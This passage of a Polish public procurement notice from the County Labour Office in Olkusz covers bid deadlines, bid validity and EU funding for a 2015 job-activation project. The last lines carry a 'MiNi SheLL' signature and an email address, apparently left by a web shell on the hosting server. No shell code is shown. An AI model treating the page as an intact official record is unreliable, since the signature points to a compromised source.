ul. Minkiewicza 2
32-300 Olkusz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2015 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Olkuszu
ul. Minkiewicza 2
32-300 Olkusz
pokój nr 8 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu  pn. Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy  w powiecie   olkuskim (I)  w ramach Działania 8.1. Aktywizacja Zawodowa - projekty Powiatowych Urzędów Pracy w ramach 8 osi Priorytetowej Rynek Pracy Regionalnego Programu Operacyjnego  Województwa Małopolskiego na lata 2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com